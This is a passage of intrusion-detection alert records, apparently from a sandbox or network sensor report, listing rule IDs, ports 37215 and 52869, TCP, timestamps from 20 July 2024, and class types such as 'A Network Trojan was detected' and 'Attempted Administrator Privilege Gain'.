                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.449592
                      SID:2025132
                      Source Port:43378
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.390246
                      SID:2831300
                      Source Port:54968
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:44.602081
                      SID:2027339
                      Source Port:33104
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.296076
                      SID:2829579
                      Source Port:37636
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.501090
                      SID:2027339
                      Source Port:60800
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:58.608087
                      SID:2027339
                      Source Port:37112
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.635828
                      SID:2829579
                      Source Port:56278
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.500152
                      SID:2027339
                      Source Port:40244
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.395457
                      SID:2025132
                      Source Port:52660
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:10.977084
                      SID:2027339
                      Source Port:60170
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.290278
                      SID:2025132
                      Source Port:33108
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.374543
                      SID:2025132
                      Source Port:53570
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:41.322614
                      SID:2027339
                      Source Port:60750
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.874808
                      SID:2831300
                      Source Port:54348
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:08.578727
                      SID:2831300
                      Source Port:35996
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:49.198416
                      SID:2027339
                      Source Port:47642
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:57.847364
                      SID:2027339
                      Source Port:42466
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.193880
                      SID:2027339
                      Source Port:34308
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:57.222008
                      SID:2829579
                      Source Port:35550
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.197712
                      SID:2025132
                      Source Port:46672
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:08.588009
                      SID:2027339
                      Source Port:34436
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:49.537827
                      SID:2027339
                      Source Port:59670
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:57.220937
                      SID:2835222
                      Source Port:42510
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.533289
                      SID:2025132
                      Source Port:44910
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:01.839255
                      SID:2027339
                      Source Port:41974
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.633481
                      SID:2829579
                      Source Port:53458
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.699478
                      SID:2027339
                      Source Port:37526
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.552279
                      SID:2027339
                      Source Port:48718
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.938949
                      SID:2831300
                      Source Port:51090
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:01.308250
                      SID:2027339
                      Source Port:47302
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.658221
                      SID:2829579
                      Source Port:47452
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.116897
                      SID:2831300
                      Source Port:47614
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:01.212254
                      SID:2025132
                      Source Port:48726
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:44.837053
                      SID:2027339
                      Source Port:42080
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:52.061339
                      SID:2027339
                      Source Port:38364
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:48.083998
                      SID:2027339
                      Source Port:36126
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.960642
                      SID:2835222
                      Source Port:40560
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:50.131564
                      SID:2027339
                      Source Port:40240
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:07.036064
                      SID:2829579
                      Source Port:45644
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:14.387649
                      SID:2025132
                      Source Port:33180
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:20.110860
                      SID:2835222
                      Source Port:57738
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.708151
                      SID:2829579
                      Source Port:54590
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.039504
                      SID:2027339
                      Source Port:52804
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:09.321968
                      SID:2027339
                      Source Port:43566
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:03.077930
                      SID:2027339
                      Source Port:42130
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.299284
                      SID:2025132
                      Source Port:39404
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:00:59.194576
                      SID:2829579
                      Source Port:58804
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.751824
                      SID:2027339
                      Source Port:44208
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.951292
                      SID:2831300
                      Source Port:54036
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:43.528108
                      SID:2027339
                      Source Port:51436
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:50.807258
                      SID:2025132
                      Source Port:35422
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:24.944299
                      SID:2835222
                      Source Port:37422
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.354421
                      SID:2831300
                      Source Port:60566
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:50.949008
                      SID:2025132
                      Source Port:60078
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:41.478929
                      SID:2025132
                      Source Port:48268
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:02.046626
                      SID:2835222
                      Source Port:36256
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.979245
                      SID:2025132
                      Source Port:33440
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:47.193367
                      SID:2025132
                      Source Port:42084
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:47.918473
                      SID:2025132
                      Source Port:38286
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:52.305893
                      SID:2027339
                      Source Port:40326
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:57.221564
                      SID:2835222
                      Source Port:33418
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:14.097795
                      SID:2835222
                      Source Port:47320
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.286738
                      SID:2829579
                      Source Port:54404
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:54.104766
                      SID:2027339
                      Source Port:44562
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.144672
                      SID:2829579
                      Source Port:54608
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:55.863393
                      SID:2831300
                      Source Port:48716
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:43.443111
                      SID:2027339
                      Source Port:50606
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.228794
                      SID:2027339
                      Source Port:33084
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.147980
                      SID:2027339
                      Source Port:47972
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.765093
                      SID:2027339
                      Source Port:33644
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:20.433034
                      SID:2025132
                      Source Port:36142
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:43.141970
                      SID:2027339
                      Source Port:48684
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:59.593869
                      SID:2025132
                      Source Port:59884
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.778817
                      SID:2027339
                      Source Port:46836
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:10.406934
                      SID:2835222
                      Source Port:55706
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.955966
                      SID:2025132
                      Source Port:35814
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:04.640460
                      SID:2025132
                      Source Port:40204
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:08.613165
                      SID:2831300
                      Source Port:52470
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:47.532849
                      SID:2027339
                      Source Port:32992
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:52.701293
                      SID:2831300
                      Source Port:53396
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:34.048618
                      SID:2835222
                      Source Port:58204
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:59.043868
                      SID:2027339
                      Source Port:41608
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.798513
                      SID:2025132
                      Source Port:47786
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:53.775275
                      SID:2027339
                      Source Port:58484
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:13.331592
                      SID:2025132
                      Source Port:56494
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:00:57.221017
                      SID:2835222
                      Source Port:34536
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.574948
                      SID:2027339
                      Source Port:43308
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.509003
                      SID:2027339
                      Source Port:48078
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.885895
                      SID:2829579
                      Source Port:49634
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.290003
                      SID:2829579
                      Source Port:55552
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:04.476708
                      SID:2027339
                      Source Port:55616
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:59.063098
                      SID:2831300
                      Source Port:55714
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:04.031511
                      SID:2835222
                      Source Port:35524
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.634077
                      SID:2835222
                      Source Port:43372
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.604425
                      SID:2027339
                      Source Port:37388
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:49.810143
                      SID:2027339
                      Source Port:32836
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:53.484243
                      SID:2027339
                      Source Port:59706
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.974656
                      SID:2835222
                      Source Port:55358
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.718643
                      SID:2025132
                      Source Port:58412
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:45.144955
                      SID:2025132
                      Source Port:33272
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:44.670958
                      SID:2027339
                      Source Port:42826
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.115778
                      SID:2027339
                      Source Port:46138
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:04.022244
                      SID:2027339
                      Source Port:48646
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.642449
                      SID:2829579
                      Source Port:55946
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.589249
                      SID:2027339
                      Source Port:44726
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.575986
                      SID:2831300
                      Source Port:43452
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:55.125263
                      SID:2831300
                      Source Port:55758
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:02:48.447183
                      SID:2027339
                      Source Port:51008
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:59.296959
                      SID:2027339
                      Source Port:58156
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.633642
                      SID:2829579
                      Source Port:35680
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.203130
                      SID:2027339
                      Source Port:59938
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.014738
                      SID:2025132
                      Source Port:60576
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:45.179680
                      SID:2025132
                      Source Port:58360
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:08.171169
                      SID:2025132
                      Source Port:48478
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:46.808111
                      SID:2027339
                      Source Port:47348
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:53.041672
                      SID:2027339
                      Source Port:39352
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:05.141553
                      SID:2027339
                      Source Port:35296
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.662837
                      SID:2027339
                      Source Port:55922
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.498942
                      SID:2027339
                      Source Port:42546
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.016560
                      SID:2027339
                      Source Port:44112
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:54.947006
                      SID:2025132
                      Source Port:48404
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:55.897722
                      SID:2027339
                      Source Port:57438
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.319020
                      SID:2831300
                      Source Port:44376
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:02.223897
                      SID:2027339
                      Source Port:57776
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.779951
                      SID:2027339
                      Source Port:37504
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:01.500174
                      SID:2025132
                      Source Port:54970
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:06.994337
                      SID:2829579
                      Source Port:37978
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.778303
                      SID:2831300
                      Source Port:38944
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:08.652877
                      SID:2831300
                      Source Port:37552
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:20.113254
                      SID:2835222
                      Source Port:56802
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.680845
                      SID:2027339
                      Source Port:37798
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:48.965786
                      SID:2027339
                      Source Port:56564
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:21.923917
                      SID:2829579
                      Source Port:32936
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:57.111220
                      SID:2831300
                      Source Port:49062
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:02:04.476708
                      SID:2027339
                      Source Port:40524
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.935667
                      SID:2027339
                      Source Port:33366
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:57.914113
                      SID:2025132
                      Source Port:36066
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:08.572197
                      SID:2027339
                      Source Port:41398
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.314906
                      SID:2831300
                      Source Port:57786
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:40.334933
                      SID:2829579
                      Source Port:35134
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.158709
                      SID:2831300
                      Source Port:38834
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:57.476832
                      SID:2025132
                      Source Port:60580
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:45.382207
                      SID:2027339
                      Source Port:51494
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.981855
                      SID:2835222
                      Source Port:36682
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:07.033766
                      SID:2835222
                      Source Port:39600
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.592479
                      SID:2027339
                      Source Port:37526
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.999991
                      SID:2829579
                      Source Port:43104
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.196993
                      SID:2835222
                      Source Port:48984
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:57.872971
                      SID:2027339
                      Source Port:35896
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.127340
                      SID:2835222
                      Source Port:37594
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.318207
                      SID:2027339
                      Source Port:33038
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.598095
                      SID:2831300
                      Source Port:35054
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:58.353725
                      SID:2027339
                      Source Port:34064
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.070492
                      SID:2829579
                      Source Port:49084
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.639093
                      SID:2835222
                      Source Port:47118
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:25.544921
                      SID:2027339
                      Source Port:46024
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:01.432181
                      SID:2025132
                      Source Port:42150
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:57.747300
                      SID:2025132
                      Source Port:40012
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:24.916250
                      SID:2829579
                      Source Port:59644
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.608320
                      SID:2831300
                      Source Port:47468
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:02.113055
                      SID:2829579
                      Source Port:57074
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.670958
                      SID:2027339
                      Source Port:40520
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:34.044223
                      SID:2835222
                      Source Port:50906
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.399866
                      SID:2025132
                      Source Port:34108
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:58.313085
                      SID:2027339
                      Source Port:51858
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.197088
                      SID:2027339
                      Source Port:55986
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.148144
                      SID:2829579
                      Source Port:45076
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:04.721025
                      SID:2831300
                      Source Port:38956
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:24.618795
                      SID:2025132
                      Source Port:38894
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:24.745266
                      SID:2027339
                      Source Port:38978
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.048889
                      SID:2831300
                      Source Port:53344
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:31.974580
                      SID:2829579
                      Source Port:48674
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:48.885298
                      SID:2025132
                      Source Port:49372
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:49.084300
                      SID:2027339
                      Source Port:40496
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:11.703257
                      SID:2027339
                      Source Port:48238
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.934977
                      SID:2835222
                      Source Port:45260
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.217142
                      SID:2027339
                      Source Port:59288
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:20.005310
                      SID:2027339
                      Source Port:50682
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.132510
                      SID:2829579
                      Source Port:40272
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:54.808195
                      SID:2831300
                      Source Port:33692
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
